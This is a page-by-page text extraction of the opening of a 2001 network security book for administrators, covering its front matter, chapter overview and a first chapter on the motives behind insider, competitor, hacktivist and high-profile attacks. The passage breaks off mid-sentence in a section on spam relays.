{ "pages": [ { "page_number": 1, "text": " \n \n \n \nrelease TeamOR 2001 \n[x] web.security \n \n \n \n \n \n \n" }, { "page_number": 2, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 2\nTable of Contents \n Active Defense — A Comprehensive Guide to Network Security - 4\n \n Introduction - 6\n \n Chapter 1 - Why Secure Your Network? - 8 \n Chapter 2 - How Much Security Do You Need? - 14 \n Chapter 3 - Understanding How Network Systems Communicate - 27 \n Chapter 4 - Topology Security - 62 \n Chapter 5 - Firewalls - 81 \n Chapter 6 - Configuring Cisco Router Security Features - 116 \n Chapter 7 - Check Point’s FireWall-1 - 143 \n Chapter 8 - Intrusion Detection Systems - 168 \n Chapter 9 - Authentication and Encryption - 187 \n Chapter 10 - Virtual Private Networking - 202 \n Chapter 11 - Viruses, Trojans, and Worms: Oh My! - 218 \n Chapter 12 - Disaster Prevention and Recovery - 233 \n Chapter 13 - NetWare - 256 \n Chapter 14 - NT and Windows 2000 - 273 \n Chapter 15 - UNIX - 309 \n Chapter 16 - The Anatomy of an Attack - 334 \n Chapter 17 - Staying Ahead of Attacks - 352 \n Appendix A - About the CD-ROM - 366 \n Appendix B - Sample Network Usage Policy - 367 \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n" }, { "page_number": 3, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 3\nSynopsis by Barry Nance \nIn one book, Brenton and Hunt deal with all the major issues you face when you want to make your network \nsecure. The authors explain the need for security, identify the various security risks, show how to design a \nsecurity policy and illustrate the problems poor security can allow to happen. Paying individual attention to \nNetWare, Windows and Unix environments, they describe how networks operate, and the authors discuss \nnetwork cables, protocols, routers, bridges, hubs and switches from a security perspective. Brenton and \nHunt explore security tools such as firewalls, Cisco router configuration settings, intrusion detection systems, \nauthentication and encryption software, Virtual Private Networks (VPNs), viruses, trojans and worms. \nBack Cover \n• \nDevelop a Systematic Approach to Network Security \n• \nLimit Your Exposure to Viruses and Minimize Damage When They \nStrike \n• \nChoose a Firewall and Configure It to Serve Your Exact Needs \n• \nMonitor Your Network and React Effectively to Hackers \nGet the Know-How To Optimize Today's Leading Security Technologies \nToday's networks incorporate more security features than ever before, yet \nhacking grows more common and more severe. Technology alone is not the \nanswer. You need the knowledge to select and deploy the technology \neffectively, and the guidance of experts to develop a comprehensive plan that \nkeeps your organization two steps ahead of mischief and thievery. Active \nDefense: A Comprehensive Guide to Network Security gives you precisely the \nknowledge and expertise you're looking for. You'll work smarter by day, and \nsleep easier by night. \nCoverage includes: \n• \nConfiguring Cisco router security features \n• \nSelecting and configuring a firewall \n• \nConfiguring an Intrusion Detection System \n• \nProviding data redundancy \n• \nConfiguring a Virtual Private Network \n• \nRecognizing hacker attacks \n• \nGetting up-to-date security information \n• \nLocking down Windows NT and 2000 servers \n• \nSecuring UNIX, Linux, and FreeBSD systems \n• \nProtecting NetWare servers from attack \nAbout the Authors \nChris Brenton is a network consultant specializing in network security and \nmultiprotocol environments. He is the author of several Sybex books, \nincluding Mastering Cisco Routers. \nCameron Hunt is a network professional specializing in information security. \nHe has worked for the U.S. military and a wide range of corporations. He \ncurrently serves as a trainer and consultant. \n \n \n \n \n \n \n" }, { "page_number": 4, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 4\n \nActive Defense — A Comprehensive Guide to \nNetwork Security \nOverview \nChris Brenton \nwith Cameron Hunt \nAssociate Publisher: \nRichard J. Staron \nContracts and Licensing Manager: \nKristine O’Callaghan \nAcquisitions and Developmental Editor: \nMaureen Adams \nEditor: \nColleen Wheeler Strand \nProduction Editor: \nElizabeth Campbell \nTechnical Editor: \nScott Warmbrand \nBook Designer: \nKris Warrenburg \nGraphic Illustrator: \nTony Jonick \nElectronic Publishing Specialist: \nMaureen Forys, Happenstance Type-O-Rama \nProofreaders: \nNanette Duffy, Emily Hsuan, Nelson Kim, Laurie O’Connell, Nancy Riddiough \nIndexer: \nRebecca Plunkett \nCD Coordinator: \nChristine Harris \nCD Technician: \nKevin Ly \nCover Designer: \nRichard Miller, Calyx Design \nCover Illustrator: \nRichard Miller, Calyx Design \nCopyright © 2001 SYBEX Inc., 1151 Marina Village Parkway, Alameda, CA 94501. World rights reserved. No \npart of this publication may be stored in a retrieval system, transmitted, or reproduced in any way, including but \nnot limited to photocopy, photograph, magnetic, or other record, without the prior agreement and written \npermission of the publisher. \nAn earlier version of this book was published under the title Mastering Network Security © 1999 SYBEX Inc. \nLibrary of Congress Card Number: 2001088118 \nISBN: 0-7821-2916-1 \nSYBEX and the SYBEX logo are either registered trademarks or trademarks of SYBEX Inc. in the United States \nand/or other countries. \nMastering is a trademark of SYBEX Inc. \nScreen reproductions produced with FullShot 99. FullShot 99 © 1991–1999 Inbit Incorporated. All rights \nreserved. \nFullShot is a trademark of Inbit Incorporated. \nThe CD interface was created using Macromedia Director, COPYRIGHT 1994, 1997–1999 Macromedia Inc. For \nmore information on Macromedia and Macromedia Director, visit http://www.macromedia.com. \n" }, { "page_number": 5, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 5\nTRADEMARKS: SYBEX has attempted throughout this book to distinguish proprietary trademarks from \ndescriptive terms by following the capitalization style used by the manufacturer. \nThe author and publisher have made their best efforts to prepare this book, and the content is based upon final \nrelease software whenever possible. Portions of the manuscript may be based upon pre-release versions supplied \nby software manufacturer(s). The author and the publisher make no representation or warranties of any kind with \nregard to the completeness or accuracy of the contents herein and accept no liability of any kind including but not \nlimited to performance, merchantability, fitness for any particular purpose, or any losses or damages of any kind \ncaused or alleged to be caused directly or indirectly from this book. \nManufactured in the United States of America \n10 9 8 7 6 5 4 3 2 1 \nThis book is dedicated to my son, \nSkylar Griffin Brenton. May the joy you have \nbrought into my life be returned to you threefold. \n—Chris Brenton \nThis book is dedicated to security professionals \neverywhere—only the truly paranoid know peace! \n—Cameron Hunt \nAcknowledgments \nI would like to thank all the Sybex people who took part in pulling this book together. This includes Guy Hart-\nDavis (a.k.a. “The Text Butcher”) for getting me started on the right track. Yet again I owe you a bottle of home-\nbrewed mead. I also want to say thank you to Maureen Adams for kicking in on the initial development and CD-\nROM work. I also wish to thank my technical editor, Jim Polizzi, whose up-front and challenging style helped to \nkeep me on my toes. \nI also wish to thank a few people over at Alpine Computers in Holliston, Mass., for giving input, making \nsuggestions, and just being a cool crew. This includes Cheryl “I Was the Evil Queen but Now I’m Just the Witch \nWho Lives in the Basement” Gordon for her years of experience and mentoring. Thanks to Chuckles Ahern, Dana \nGelinas, Gene Garceau, Phil Sointu, Ron Hallam, Gerry Fowley, the guys in the ARMOC, Bob Sowers, Steve \nHoward, Alice Peal, and all the members of the firewall and security group for keeping me challenged technically \n(or technically challenged, whichever the case may be). \nOn a more personal note, I would like to thank Sean Tangney, Deb Tuttle, Al “That Was Me behind You with the \nBFG” Goodniss, Maria Goodniss, Chris Tuttle, Toby Miller, Lynn Catterson, and all the Babylonian honeys for \nbeing such an excellent group of friends. Thanks to Morgan Stern, who is one of the smartest computer geeks I \nknow and is more than happy to share his knowledge with anyone who asks. Thanks also to Fred Tuttle for being a \ncool old-time Vermonter and for showing that people can still run for political office and keep a sense of humor. \nI also wish to thank my parents Albert and Carolee, as well as my sister Kym. The happiness I have today comes \nfrom the love, guidance, and nurturing I have received from you over many years. I could not have wished for a \nbetter group of people to call my family. \nFinally, I would like to thank my wonderful wife and soul mate Andrea for being the best thing ever to walk into \nmy life. My life would not be complete without you in it, and this book would not have been possible without your \nsupport. Thank you for making me the luckiest man alive. \n—Chris Brenton \nI’d like to thank my friends for their patience, my family for their tolerance, and of course, Nikka, whose \nknowledge of all my vices and vulnerabilities allowed her to use an astonishing array of incentives to force my \ntimely completion of this book. \nI owe an incredible debt to the many security professionals—who have shared their nuanced understanding of \ncurrent security technologies and the issues surrounding their use—for the preparation of this book. This revision \nis as much yours as mine. \nI owe Jill Schlessinger a tremendous debt for giving me this opportunity in the first place. She patiently listened to \nmy radical revision plan, ignored it, and forced me to follow common sense. She was right all along. Maureen \nAdams accomplished institutional miracles, while Elizabeth Campbell and Colleen Strand employed the most \n" }, { "page_number": 6, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 6\ningenius good cop-bad cop routine to keep me properly motivated, and more importantly—on schedule! Thank \nyou ladies, the pleasure has been all mine! \n—Cameron Hunt \n \nIntroduction \nOverview \nSome of us can remember a time when securing a network environment was a far easier task than it seems to be \ntoday. As long as every user had a password and the correct levels of file permissions had been set, we could go to \nsleep at night confident that our network environment was relatively secure. This confidence may or may not have \nbeen justified, but at least we felt secure. \nThen along came the Internet and everything changed. The Internet has accelerated at an amazing rate the pace at \nwhich information is disseminated. In the early 1990s, most of us would not hear about a security vulnerability \nunless it made it into a major magazine or newspaper. Even then, the news release typically applied to an old \nversion of software that most of us no longer used anyway. These days, hundreds of thousands of people can be \nmade privy to the details of a specific vulnerability in less than an hour. \nThis is not to say that all this discussion of product vulnerabilities is a bad thing. Actually, quite the opposite is \ntrue. Individuals with malicious intent have always had places to exchange ideas. Pirate bulletin boards have been \naround since the 1980s. Typically, it was the rest of us who were left out in the cold with no means of dispersing \nthis information to the people who needed it most: the network administrators attempting to maintain a secure \nenvironment. The Internet has become an excellent means to get vulnerability information into the hands of the \npeople responsible for securing their environments. \nIncreased awareness also brings increased responsibility. This is not only true for the software company that is \nexpected to fix the vulnerability; it is also true for the network administrator or security specialist who is expected \nto deploy the fix. Any end user with a subscription to a mailing list can find out about vulnerabilities as quickly as \nthe networking staff. This greatly increases the urgency of deploying security-related fixes as soon as they are \ndeveloped. (As if we didn’t have enough on our plates already!) \nSo, along with all of our other responsibilities, we need to maintain a good security posture. The first problem is \nwhere to begin. Should you purchase a book on firewalls or on securing your network servers? Maybe you need to \nlearn more about network communications in order to be able to understand how these vulnerabilities can even \nexist. Should you be worried about running backups or redundant servers? \nOne lesson that has been driven home since the publication of the first edition of this book is the need to view \nsecurity not as a static package, but rather as a constant process incorporating all facets of networking and \ninformation technology. You cannot focus on one single aspect of your network and expect your environment to \nremain secure. Nor can this process be done in isolation from other networking activities. This book provides \nsystem and network administrators with the information they will need to run a network with multiple layers of \nsecurity protection, while considering issues of usability, privacy, and manageability. \n \nWhat This Book Covers \nChapter 1 starts you off with a look at why someone might attack an organization’s network resources. You will \nlearn about the different kinds of attacks and what an attacker stands to gain by launching them. At the end of the \nchapter, you’ll find a worksheet to help you gauge the level of potential threat to your network. \nChapter 2 introduces risk analysis and security policies. The purpose of a risk analysis is to quantify the level of \nsecurity your network environment requires. A security policy defines your organization’s approach to \nmaintaining a secure environment. These two documents create the foundation you will use when selecting and \nimplementing security precautions. \nIn Chapter 3, you’ll get an overview of how systems communicate across a network. The chapter looks at how the \ninformation is packaged and describes the use of protocols. You’ll read about vulnerabilities in routing protocols \nand which protocols help to create the most secure environment. Finally, the chapter covers services such as FTP, \nHTTP, and SMTP, with tips on how to use them securely. \nChapter 4 gets into topology security. In this chapter, you’ll learn about the security strengths and weaknesses of \ndifferent types of wiring, as well as different types of logical topologies, such as Ethernet and Frame Relay. \nFinally, you’ll look at different types of networking hardware, such as switches, routers, and layer-3 switching, to \nsee how these devices can be used to maintain a more secure environment. \nChapter 5 discusses perimeter security devices such as packet filters and firewalls. You will create an access \ncontrol policy (based on the security policy created in Chapter 2) and examine the strengths and weaknesses of \n" }, { "page_number": 7, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 7\ndifferent firewalling methods. Also included are some helpful tables for developing your access control policy, \nsuch as a description of all of the TCP flags as well as descriptions of ICMP type code. \nIn Chapter 6, we’ll discuss creating access control lists on a Cisco router. The chapter begins with securing the \nCisco router itself and then goes on to describe both standard and extended access lists. You’ll see what can and \ncannot be blocked using packet filters and take a look at a number of access list samples. The end of the chapter \nlooks at Cisco’s new reflexive filtering, which allows the router to act as a dynamic packet filter. \nYou’ll see how to deploy a firewall in your environment in Chapter 7. Specifically, you’ll walk through the setup \nand configuration of Check Point’s FireWall-1: securing the underlying operating system, installing the software, \nand implementing an access control policy. \nChapter 8 discusses intrusion detection systems (IDS). You’ll look at the traffic patterns an IDS can monitor, as \nwell as some of the technology’s limitations. As a specific IDS example, you will take a look at Internet Security \nSystems’ RealSecure. This includes operating system preparation, software installation, and how to configure \nRealSecure to check for specific types of vulnerabilities. \nChapter 9 looks at authentication and encryption. You will learn why strong authentication is important and what \nkinds of attacks exploit weak authentication methods. You’ll also read about different kinds of encryption and how \nto select the right algorithm and key size for your encryption needs. \nRead Chapter 10 to learn about virtual private networking (VPN), including when the deployment of a VPN \nmakes sense and what options are available for deployment. As a specific example, you will see how to use two \nFireWall-1 firewalls to create a VPN. You will also see before and after traces, so you will know exactly what a \nVPN does to your data stream. \nChapter 11 discusses viruses, Trojan horses, and worms. This chapter illustrates the differences between these \napplications and shows exactly what they can and cannot do to your systems. You will see different methods of \nprotection and some design examples for deploying prevention software. \nChapter 12 is all about disaster prevention and recovery, peeling away the different layers of your network to see \nwhere disasters can occur. The discussion starts with network cabling and works its way inside your network \nservers. You’ll even look at creating redundant links for your WAN. The chapter ends by discussing the setup and \nuse of Qualix Group’s clustering product OctopusHA+. \nNovell’s NetWare operating system is featured in Chapter 13. In this chapter, you’ll learn about ways to secure a \nNetWare environment through user account settings, file permissions, and NDS design. We’ll discuss the auditing \nfeatures that are available with the operating system. Finally, you’ll look at what vulnerabilities exist in NetWare \nand how you can work around them. \nChapter 14 discusses Microsoft Windows networking technologies, specifically NT server and Windows 2000 \nServer. You’ll look at designing a domain structure that will enhance your security posture, as well as how to use \npolicies. We’ll discuss working with user accounts’ logging and file permissions, as well as some of the password \ninsecurities with Windows NT/2000. Finally, you’ll read about the IP services available with NT and some of the \nsecurity caveats in deploying them. \nChapter 15 is all about UNIX (and the UNIX clones, Linux and FreeBSD). Specifically, you’ll see how to lock \ndown a system running the Linux operating system. You’ll look at user accounts, file permissions, and IP services. \nThis chapter includes a detailed description of how to rebuild the operating system kernel to enhance security even \nfurther. \nEver wonder how an evil villain might go about attacking your network resources? Read Chapter 16, which \ndiscusses how attackers collect information, how they may go about probing for vulnerabilities, and what types of \nexploits are available. You’ll also look at some of the canned software tools that are available to attackers. \nChapter 17 shows you how you can stay informed about security vulnerabilities. This chapter describes the \ninformation available from both product vendors and a number of third-party resources. Vulnerability databases, \nWeb sites, and mailing lists are discussed. Finally, the chapter ends with a look at auditing your environment using \nKane Security analyst, a tool that helps you to verify that all of your systems are in compliance with your security \npolicy. \n \nWho Should Read This Book \nThe book is specifically geared toward the individual who does not have ten years of experience in the security \nfield—but is still expected to run a tight ship. If you are a security guru who is looking to fill in that last five \npercent of your knowledge base, this may not be the book for you. \nIf, however, you are looking for a practical guide that will help you to identify your areas of greatest weakness, \nyou have come to the right place. This book was written with the typical network or system administrator in mind, \nthose administrators who have a pretty good handle on networking and the servers they are expected to manage, \nbut who need to find out what they can do to avoid being victimized by a security breach. \nNetwork security would be a far easier task if we could all afford to bring in a $350-per-hour security wizard to \naudit and fix our computer environment. For most of us, however, this is well beyond our budget constraints. A \n" }, { "page_number": 8, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 8\nstrong security posture does not have to be expensive—but it does take time and attention to detail. The more \nholes you can patch within your networking environment, the harder it will be for someone to ruin your day by \nlaunching a network-based attack. \nIf you have any questions or comments regarding any of the material in this book, feel free to e-mail us at \ncbrenton@sover.net or cam@cameronhunt.com. \n \nChapter 1: Why Secure Your Network? \nYou only have to look at the daily newspaper to see that computer-based attacks are on the rise. Nearly every day, \nwe hear that systems run by government and private organizations have been disrupted or penetrated. Even high-\nprofile entities like the U.S. military and Microsoft have been hacked. You might wonder what you can do to \nprotect your company, when organizations like these can fall prey to attack. \nTo make matters worse, not all attacks are well publicized. While attacks against the FBI may make the front \npage, many lower-profile attacks never even reach the public eye. Revealing to the public that a company has had \nits financial information or latest product designs stolen can cause serious economic effects. For example, consider \nwhat would happen if a bank announced that its computer security had been breached and a large sum of money \nstolen. If you had accounts with this bank, what would you do? Clearly, the bank would want to keep this incident \nquiet. \nFinally, there may well be a large number of attacks that go completely undocumented. The most common are \ninsider attacks: in such cases, an organization may not wish to push the issue beyond terminating the employee. \nFor example, a well-known museum once asked me to evaluate its current network setup. The museum director \nsuspected that the networking staff may have been involved in some underhanded activities. \nI found that the networking staff had infiltrated every user’s mailbox (including the director’s), the payroll \ndatabase, and the contributors’ database. They were also using the museum’s resources to run their own business \nand to distribute software tools that could be used to attack other networks. Despite all these infractions, the \nmuseum chose to terminate the employees without pursuing any legal action. Once terminated, these ex-\nemployees attempted to utilize a number of “back doors” that they had set up for themselves into the network. \nEven in light of this continued activity, the museum still chose not to pursue criminal charges, because it did not \nwish to make the incident public. \nThere are no clear statistics on how many security incidents go undocumented. My own experience suggests that \nmost, in fact, are not documented. Clearly, security breaches are on the rise, and every network needs strategies to \nprevent attack. \nTip \nYou can report security intrusions to the Computer Emergency Response Team (CERT) \nCoordination Center at cert@cert.org. CERT issues security bulletins and can also facilitate \nthe release of required vendor patches. \nBefore we get into the meat of how to best secure your environment, we need to do a little homework. To start, we \nwill look at who might attack your network—and why. \nThinking Like an Attacker \nIn order to determine how to best guard your resources, you must identify who would want to disrupt them. Most \nattacks are not considered random; the person staging the attack usually believes there is something to gain by \ndisrupting your assets. For example, a crook is more likely to rob someone who appears wealthy, because the \nappearance of wealth suggests larger financial gain. Identifying who stands to gain from stealing or disrupting \nyour resources is the first step toward protecting them. \nAttacker, Hacker, and Cracker \nPeople, from trade magazine writers to Hollywood moviemakers, often use the words attacker, hacker, and \ncracker interchangeably. The phrase “we got hacked” has come to mean “we were attacked.” \nHowever, there are some strong distinctions between the three terms, and understanding the differences will help \nyou to understand who is trying to help reinforce your security posture—and who is trying to infiltrate it. An \nattacker is someone who looks to steal or disrupt your assets. An attacker may be technically adept or a rank \namateur. An attacker best resembles a spy or a crook. \nThe original meaning of a hacker was someone with a deep understanding of computers and/or networking. \nHackers are not satisfied with simply executing a program; they need to understand all the nuances of how it \n" }, { "page_number": 9, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 9\nworks. A hacker is someone who feels the need to go beyond the obvious. The art of hacking can be either positive \nor negative, depending on the personalities and motivations involved. \nHacking has become its own subculture, with its own language and accepted social practices. It is probably human \nnature that motivates people outside of this subculture to identify hackers as attackers or even anarchists. In my \nopinion, however, hackers are more like revolutionaries. \nHistory teems with individuals whose motivation was beyond the understanding of the mainstream culture of their \ntime. Da Vinci, Galileo, Byron, Mozart, Tesla—all were considered quite odd and out of step with the accepted \nsocial norm. In the information age, this revolutionary role is being filled by the individuals we call hackers. \nHackers tend not to take statements at face value. For example, when a vendor claims, “Our product is 100 percent \nsecure,” a hacker may take this statement as a personal challenge. What a hacker chooses to do with the \ninformation uncovered, however, is what determines what color hat a particular hacker wears. \nTo distinguish between hackers who are simply attempting to further their understanding of any information \nsystem and those who use that knowledge to illegally or unethically penetrate systems, some in the computer \nindustry use the term cracker to refer to the latter. This was an attempt to preserve the traditional meaning of the \nterm “hacker,” but this effort has mostly been unsuccessful. Occasionally publications still use the term. The law, \nhowever, does not recognize the difference in intent, only the similar behavior of unauthorized system penetration. \nWhite Hat, Grey Hat, and Black Hat Hackers \nA hacker who finds a method of exploiting a security loophole in a program, and who tries to publish or make \nknown the vulnerability, is called a white hat hacker. If, however, a hacker finds a security loophole and chooses \nto use it against unsuspecting victims for personal gain, that hacker wears a black hat. A grey hat hacker is \nsomeone who is a “white hat by day, black hat by night.” In other words, hackers who are usually employed as \nlegitimate security consultants, but continue their illegal activity on their own time. \nLet’s look at an example of someone who might be considered a grey hat. Imagine Jane, a security consultant who \nfinds an insecure back door to an operating system. Although Jane does not use the exploit to attack unsuspecting \nvictims, she does charge a healthy fee in order to secure her client’s systems against this attack. In other words, \nJane is not exploiting the deficiency per se, but she is using this deficiency for her own personal gain. In effect, \nshe is extorting money from organizations in order to prevent them from being left vulnerable. Jane does not work \nwith the manufacturer towards creating a public fix for this problem, because it is clearly within her best interests \nto insure that the manufacturer does not release a free patch. \nTo cloud the issue even further, many people mistake the motivation of those who post the details of known bugs \nto public forums. People often assume that these individuals are announcing such vulnerabilities in order to \neducate other attackers. This could not be further from the truth—releasing vulnerability information to the public \nalerts vendors and system administrators to a problem and the need to address it. Many times, publicly announcing \na vulnerability is done out of frustration or necessity. \nFor example, back when the Pentium was the newest Intel chip in town, users found a bug that caused \ncomputation errors in the math coprocessor portion of the chip. When this problem was first discovered, a number \nof people did try to contact Intel directly in order to report the problem. I spoke with a few, and all stated that their \nclaims were met with denial or indifference. \nIt was not until details of the bug were broadcast throughout the Internet and discussed in open forums that Intel \ntook steps to rectify the problem. While Intel did finally stand by its product with a free chip replacement program, \npeople had to air Intel’s dirty laundry in public to get the problem fixed. Making bugs and deficiencies public \nknowledge can be a great way to force a resolution. \nNote \nIt is proper etiquette to inform a product’s vendor of a problem first and not make a \npublic announcement until a patch has been created. The general guideline is to give a \nvendor at least two weeks to create a patch before announcing a vulnerability in a public \nforum. \nMost manufacturers have become quite responsive to this type of reporting. For example, Microsoft will typically \nissue fixes to security-related problems within a few days of their initial announcement. Once the deficiency is \npublic knowledge, most vendors will want to rectify the problem as quickly as possible. \nPublic airing of such problems has given some observers the wrong idea. When someone finds a security-related \nproblem and reports it to the community at large, others may think that the reporter is an attacker who is exploiting \nthe security deficiency for personal gain. This openness in discussing security-related issues, however, has led to \nan increase in software integrity. \n \n" }, { "page_number": 10, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 10\nWhy Would Someone Want to Ruin My Day? \nSo what motivates a person to stage an attack against your network? As stated, it is extremely rare for these attacks \nto be random. They almost always require that something be gained by the attack. What provokes the attack \ndepends on your organization and on the individual staging the attack. \nAttacks from Within \nCase studies have shown that a vast majority of attacks originate from within an organization. In fact, some studies \nstate that as much as 70 percent of all attacks come from someone within an organization or from someone with \ninside information (such as an ex-employee). While using firewalls to protect assets from external attacks is all the \nrage, it is still the employees—who have an insider’s view of how your network operates—who are responsible \nfor the greatest amount of damage to, or compromise of, your data. This damage can be accidental (as in user \nerror), or in some cases, intentional. \nThe most typical cause of a true attack is a disgruntled employee or ex-employee. I once responded to an \nemergency call from a new client who had completely lost Internet connectivity. Because this was a research firm, \nInternet access was essential. \nApparently the firm had decided to let an employee “move on to other opportunities,” despite the fact that the \nemployee did not wish to leave. Evidently the employee had been quietly asked to pack his personal belongings \nand leave the building. Being a small organization, the company did not see the need to escort this individual out \nthe door. \nOn his way out, the former employee made a brief stop at the UNIX system running the company’s firewall \nsoftware. The system was left out in the open and did not use any form of console password. He decided to do a \nlittle farewell “housekeeping” and clean up all those pesky program files cluttering up the system. For good \nmeasure, he also removed the router’s V.34 cable and hid it in a nearby desk. As you can imagine, it cost the \norganization quite a bit in lost revenue to recover from this disaster. The incident could have been avoided had the \nequipment been stored in a locked area. \nWhile most administrators take great care in protecting their network from external attacks, they often overlook \nthe greater threat of an internal attack. A person does not even have to be an attacker in order to damage company \nresources. Sometimes the damage is done out of ignorance. \nFor example, one company owner insisted on having full supervisor privileges on the company’s NetWare server. \nWhile he was not particularly computer literate and did not actually require this level of access, he insisted on it \nsimply because he owned the company. \nI’m sure you can guess what happened. While doing some housekeeping on his system, he inadvertently deleted \nthe CCDATA directory on his M: drive. If you have ever administered cc:Mail, you know that this directory is the \nrepository for the postoffice, which contains all mail messages and public folders. \nIn cc:Mail, the main mail files are almost always open and are difficult to back up by normal means. The company \nlost all mail messages except for personal folders, which most employees did not use. Approximately two years’ \nworth of data just disappeared. While this was not a willful attack, it certainly cost the company money. \nAn ever-increasing threat is not the destruction of data, but its theft and compromise. This is usually referred to as \nindustrial (or corporate) espionage, and, although not considered as common as internal data destruction, it is still \na viable threat to any organization that has proprietary or confidential information—especially when the \ncompromise of that data would leave the organization legally liable. An example of this would be any organization \ninvolved with health care that falls under the jurisdiction of the Health Insurance Portability and Accountability \nAct (1996—USA). Under the Administrative Simplification provisions of HIPAA, security standards are \nmandated to protect an individual’s health information, while permitting appropriate access and use of that \ninformation. Any breach of confidentiality could lead to legal action on behalf of the federal government. \nExternal Attacks \nExternal attacks can come from many diverse sources. While these attacks can still come from disgruntled \nemployees, the range of possible attackers increases dramatically. The only common thread is that usually \nsomeone gains by staging the attack. \n" }, { "page_number": 11, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 11\nCompetitors \nIf you are in a highly competitive business, an ambitious competitor may see a benefit in attacking your network. \nThis can take the form of stealing designs or financial statements, or just making your network resources unusable. \nThe benefit of stealing a competitive design is obvious. Armed with this information, a thieving organization can \nuse your design to shorten its own development time or to equip its own product release with better features. If a \ncompetitor knows what products your organization will release in the near future, that competitor can beat you to \nmarket with a more attractive product. \nThe theft of financial information can be just as detrimental. A competitor can gain a complete fiscal overview of \nyour organization—and an unfair advantage in the marketplace. This unfair advantage can come from having an \ninsider’s view of your organization’s financial health, or just from understanding your sources of income. \nFor example, I once heard of a computer consulting firm that infiltrated the network of a competitor, stealing a \nfiscal spreadsheet that showed sources of the company’s revenue. The attacker was particularly interested to learn \nthat over 60 percent of revenue came from the sale of fax machines, printers, and copiers. I’m told that this \nallowed the thieves to walk into a client site and ask, “Are you sure you want to rely on Company X for your \nnetworking needs? They are, after all, primarily an office supply company. Most of their business is from selling \nfaxes and copiers.” This tactic won over more than one client. \nSometimes, however, an attacker does not need to remove anything in order to benefit. For example, let’s assume \nthat you work for a distribution firm that generates sales through your Web site. You have your catalog online, and \ncustomers can place orders using secure forms. For your specific market niche, you have the lowest prices \navailable. \nNow, let’s assume that I am your largest competitor but that my prices are slightly higher. It would help my \nbusiness if I could stop your Web site from accepting inbound connections. It would appear to a potential \ncustomer that your Web site is offline. Customers who could not reach your Web site might next decide to check \nout mine instead. Since your site is not available, customers cannot compare prices—and they may go ahead and \norder the product from my site. \nNo actual theft has taken place, but this denial of service is now directly responsible for lost revenue. Not only is \nthis type of attack difficult to prove, it can be even more difficult to quantify. If your site is offline for eight hours, \nhow do you know how many sales were lost? \nHow prone you may be to competitors’ attacks relates directly to how competitive your business is. For example, a \nhigh school need not worry about a competitive school stealing a copy of next year’s curriculum. A high school \ndoes, however, have a higher than average potential for internal attacks. \nMilitant Viewpoints \nIf your business can be considered controversial, you may be prone to threats from others who take a different \npoint of view. \nFor example, I was once called in by an organization that published information on medical research. The \norganization’s Web site included documentation on abortions. Someone searching the site e-mailed the \nWebmaster, suggesting that some of the information on the site was not what the company intended. The \nadministrator found that all pages discussing abortion issues had been replaced by pro-life slogans and biblical \nquotations. \nAgain, such attacks fall into a gray area. Since no information was stolen, it would be difficult to prosecute the \nattacker. The most relevant laws at the time would have labeled this attack as graffiti or vandalism. \nBut times are changing. The high-profile nature of security breaches has made them newsworthy, and activists \nfrom around the world are using them to further their own goals. The first type is the truly militant hacker, \ncarrying military or violent conflicts into the cyber world. There are four well-known examples: \nƒ \nDuring the spring of 1998, in what many observers saw as saber-rattling, Pakistan and \nIndia tested nuclear weapons and engaged in a war of words. Pakistani and Indian \nhackers each launched an assault on the Web sites that were controlled by the other \ngroup. \n" }, { "page_number": 12, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 12\nƒ \nSerbian and Albanian hackers penetrated each other’s sites during the NATO bombing of \nSerbia in the spring of 1999. \nƒ \nPalestinian and Israeli hackers (both groups mostly based in the United States) waged a \nfierce cyberwar that matched the intense real-world hostility that occurred after an Israeli \ngovernment official visited a Palestinian holy site in late 2000. Even Ehud Tenebaum, the \nIsraeli hacker known as “The Analyzer,” who achieved fame in 1998 as the mastermind \nof the biggest Pentagon attacks in history, joined the fray. \nƒ \nAt a lower level, Taiwanese and Chinese hackers have attempted to deface and discredit \neach other in the cyber arena for years—all over which side has legitimate claim to the \nisland of Taiwan \nThe other type is usually motivated by something other than greed or violence. Often called “hacktivists,” these \nindividuals attack systems with the goal of stopping services, defacing Web sites, or generally drawing attention to \ntheir cause. Recent examples include: \nƒ \nOn November 7, 2000 (the day of the U.S. Presidential Election in the United States), a \nhacker penetrated the Republican National Committee page and replaced its text with an \nendorsement of Vice President Al Gore. \nƒ \nIn June 2000, S11, an Australian group, hijacked Nike.com and sent Nike’s intended \nvisitors to S11’s anti-Nike site (protesting worker conditions in Nike factories). \nƒ \nDuring the World Trade Organization meeting in 1999, the Electrohippies, a group based \nin Britain, temporarily shut down the WTO’s web site. \nHigh Profile \nOrganizations that are well known or frequently in the public eye can become subjects of attack simply due to \ntheir level of visibility. A would-be attacker may attempt to infiltrate a well-known site with the hope that a \nsuccessful attack will bring with it some level of notoriety. Examples of high-profile attacks over the past few \nyears include: \nƒ \nIn March 1997, a group called H4G1S compromised one of NASA’s Web pages and used \nit as a forum to warn of future attacks on organizations responsible for commercializing \nthe Internet. The attack had nothing to do with NASA directly—except for providing some \nhigh visibility for the group. \nƒ \nDuring May of 1999, major U.S. government sites—including Whitehouse.gov, FBI.gov, \nand Senate.gov—were defaced. \nƒ \nIn February 2000, some of the most high-profile Internet companies suffered from \ndenial-of-service attacks, including: Amazon.com, Buy.com, CNN.com, eBay, E*Trade, \nYahoo!, and ZDNet. \nƒ \nMicrosoft revealed in late October 2000 that hackers had penetrated their site over a \nseries of weeks. Although Microsoft claimed to have been aware of the hackers from the \nbeginning, it was nonetheless a humbling moment for the organization. \nDetermining whether or not your organization is high profile can be difficult. Most organizations tend to \noverestimate their visibility or presence on the Internet. Unless you are part of a multinational organization, or \nyour site counts daily Web hits in the six-figure range, you are probably not a visible enough target to be attacked \nsimply for the notoriety factor. \nBouncing Mail \nArguably, the most offensive type of attack is to have your domain’s mail system used as a spam relay. Spam is \nunsolicited advertising. Spammers deliver these unsolicited ads in hopes that sheer volume will generate some \ninterest in the product or service advertised. Typically, when a spammer sends an advertisement, it reaches 